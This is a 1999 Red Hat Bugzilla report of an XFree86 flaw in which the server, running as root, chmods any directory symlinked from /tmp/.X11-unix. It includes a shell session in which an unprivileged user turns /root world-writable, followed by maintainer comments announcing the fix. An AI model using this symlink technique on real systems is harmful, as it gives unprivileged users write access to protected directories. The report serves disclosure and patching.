Bug 1816

Summary: XFree86 chmods directories symlinked from /tmp/.X11-unix
Product: [Retired] Red Hat Linux Reporter: Bourne, Jim <jbourne>
Component: XFree86Assignee: Preston Brown <pbrown>
Status: CLOSED CURRENTRELEASE QA Contact:
Severity: medium Docs Contact:
Priority: high    
Version: 5.2CC: pbrown, wangsmo
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: i386   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 1999-03-30 21:01:00 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Bourne, Jim 1999-03-26 16:04:29 UTC 
Following a bugtraq report of NetBSD X11 chmoding /root to
1777 by following a symlink in /tmp I tried it under Linux.

This is an XFree86 bug, and because it sets the permissions
on /tmp/.X11-unix as root, the server will chmod any
directory symlinked from that directory in /tmp.

It has been confirmed on i386 platform but will likely
effect all platforms.

********************** example ********************
bash$ id
uid=543(tester) gid=100(users) groups=100(users)
bash$ pwd
/home/tester
bash$ cd /tmp
bash$ ls -la
total 3
drwxrwxrwt   3 root     root         1024 Mar 25 19:11 .
drwxr-xr-x  18 root     root         1024 Mar 24 10:50 ..
bash$ ls -ld /root
drwx------   5 root     root         1024 Mar 25 19:02 /root
bash$ ln -sf /root .X11-unix
bash$ ls -l .X11-unix
lrwxrwxrwx   1 tester   users           5 Mar 25 19:47
.X11-unix -> /root
bash$ startx
(X output removed)
^C
waiting for X server to shut down

bash$ ls -ld /root
drwxrwxrwt   5 root     root         1024 Mar 25 19:47 /root

******************** end example *************************

I have also submitted this to xfree86
Comment 1 Preston Brown 1999-03-29 17:21:59 UTC 
fixed in XFree86-3.3.3.1-31 and later.
Comment 2 Preston Brown 1999-03-29 17:23:59 UTC 
We will be putting out a fix for XFree86 on Red Hat 4.x and 5.x later
today, in addition to the fixed package which exists in RawHide right
now.